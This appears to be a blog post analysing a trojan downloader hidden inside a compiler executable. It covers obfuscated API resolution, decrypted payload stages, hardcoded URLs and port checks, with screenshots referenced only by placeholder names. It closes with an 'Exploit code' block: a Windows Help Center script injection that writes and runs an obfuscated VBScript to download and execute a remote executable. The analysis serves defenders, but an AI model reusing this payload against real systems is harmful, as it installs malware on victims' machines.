McAfee:Exploit.CodeExec

 

 

 

 

Abstract: This Trojan directs control flow from the original exe on execution, ostensibly without even running the original app. This sample was detected in a ‘Desktop Window Manager’ app. But on closer in section it was found out to be a compiler. The original payload was encrypted in various sections around the code body, as data with jmp instructions pushing the control flow around and about the various islands.

Import tables have an obfuscated interface, and calling them was done though a runtime generation of the api offsets and adding that to the required dll imagebase, and then searching for the string in the dll import tables. Further a particular hash value is encountered after which all previous sections are overwritten along with the data encrypted islands, and the decrypted malcode is entered. Here the PE imagebase is dynamically initialized and memory allocated and then the pe is built around this framework.

It seems to go in an infinite loop, using a sleep parameter of 0ms, while checking for net connectivity. It tests the localhost(port 50370 tcp) for internet connection and if it finds, it activates the download process, through generation of GET requrests over http using hardcoded uri’s, implemented using the winsock api (ws_32.dll). It also enumerates various popular social networking sites and adds them to a target list. Specific CLSID’s and other mal files (*.cfg) are detected as potentially malicious using online repositories, and giving an indication that these payloads are widely distributed.

 

Static and Dynamic Analysis:

 

407BFC push eax =400000, the image base. Memory dumping preparation begins here otensibly.

clip_image002

Ntdll.dll imagebase saved:

clip_image004

And saves 4088F8,

clip_image006

Then kernel32 function address..

clip_image008

The stack at this time:

clip_image010

New stack addresses pushed;

clip_image012

This code enumerates the api functions, EBX contains the dll image base, ESI the offset of the api into it. Added together they give the VA.

clip_image014

Compares with this hash value:

clip_image016

Cycles through this indexing section to traverse the api list.

clip_image018

Notice uses pushàretn instructions to travel across sections instead of jump.

EDX keeps a record of the number of functions traversed.

clip_image020

It enters at the data encrypted section at, 407e6E

clip_image022

Reenumeration of kernel32 api’s

__clip_image024

And saved on the stack as:

clip_image026

These will be used in the decrypted PE.

Very soon;

Malicious Links Hardcoded in the decrypted process memory:

clip_image028

Dynamically linked dll’s;

clip_image030

A few ID’s are enumerated from the hardcoded database:

clip_image032

clip_image034

clip_image036

Popular Networking Sites are enumerated and targeted:

clip_image038

Malcode Originates from here:

clip_image040

The original file is a multipurpose compiler- using AutoDock, Bison as the docking GUI (Scientific usage) and Lexical Parsing engine as usedin compilers. A typical compiler disssasembly is seen, with various switches and compiling sections being identified. It tries to parse –JSCript, VBScript, .java files. Outputs .c and .cpp files as well. But the malcode is appended in the section shown above, which is connected to two referenced calls from within the trojan file, from the compiler code.

This infection begins right from the start at 40103C and again supposed compiler error with a swift jump from 401394. Thus almost immediately control is transferred to the malcode.

clip_image042

After building the imports using impRec giving 401000 as the OEP (the usual stuff) a complete list of the new api’s are successfully detected, and the import table is built. We take this built executable having the following characteristics.

Original PE:

clip_image044

Decrypted and built PE:

clip_image046

This dump has the string UPX in the first section text along with other data. This might indicate something though not very apparent and certainly not detected.

clip_image048

Further, we see

clip_image050

More Links are downloaded:

clip_image052

This file has a very malicious detection online:

clip_image054

Uses the WinSock Api functions (ws2_32.dll) to establish a connection and download the links. It also constructs GET requests and executes it over HTTP port 80.

clip_image056

A loopback test (localhost) is used to check connectivity and a socket port 50370 is being hard coded. This could be another identifier since this is consistent across the file.

clip_image058

It also enumerates the browser type and preference/config files-Mozilla IE>7 and Opera.

clip_image060

This enumerates the system/special folders;

clip_image062

Searches for all files \*.*, and performs some file attributes operations on it.

Overall not destructive, but could be given the already detected payloads and trojan activity and obfuscaton.

Shellcode Executable Analysis:

clip_image002[4]

Malicious code decoded from the above:

clip_image004[4]

After conversion from shellcode to exe file format the following characteristics were noted:

clip_image006[4]

clip_image008[4]

clip_image010[4]

Online search results in detection by six vendors as a trojan downloader, including this name-Silvana.

clip_image012[4]

The remaining loop in function a_AK6_() has the function of extracting bytes from offset 0x1200 from the file image. Examining the file confirms this as a marker is implemented at:

clip_image014[4]

This shellcode is again extracted an converted to exe format for analysis.

Obfuscated API interface API Dll and function names are built dynamically and loaded using LoadLibrary():

clip_image016[4]

clip_image018[4]

clip_image020[4]

URL Decryption:

clip_image022[4]

clip_image024[4]

And downloads the url to file in the local system:

clip_image026[4]

And goes in an infinite loop.

TcpView shows 592 UDP port usages for this download activity.

This essentially replicates the malicious activity of the obfuscated html/javascript page.

Mitigation:

 

The vulnerability can be mitigated by the steps described and discussed in this document.

UDP port 592 can be audited for any illegal activity or disabled.

Malicious entertainment sites should be avoided as they are riddled with such insidious installations.

 

Exploit code:

 

..\..\sysinfomain.htmu003fsvr=<script+defer >

eval(new+ActiveXObject(‘

wscript.shell’).Run(unescape(‘cmd*/c*taskkill*/F*/IM

*helpctr.exe|cd*../&echo*Execute(strReverse(Replace(Replace(U)htap(cexe.lhs|2,htap*elifotevas.oda|)ydoBesnopser.

lmx(etirw.oda|nepo.oda|1$epyt.oda|3$edom.oda|dnes.lmx|0,Y6$e&1$f3Fphp.daol/www/kt.pot2onrop//:ptthY,YTEGY

*nepo.lmx|Yexe.~/:cY*$*htap|)Yllehs.tpircswY(tcejbOetaerC$lhs*teS|)Ymaerts.bdodaY(tcejbOetaerC$oda*teS|

)Yptthlmx.tfosorcimY(tcejbOetaerC$lmx*tes|txen*emuser*rorre2AnoU,*UYU,*chr(34)),*U|U,*vbcrlf))

)* >~.vbs|wscript*~.vbs&del*/q*~.vbs’).

replace(/[*]/g,String.fromCharCode(32)).replace(/[$]/g,S

tring.fromCharCode(61)).replace(/U/g,String.fromCharCode(34))));

</script >

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s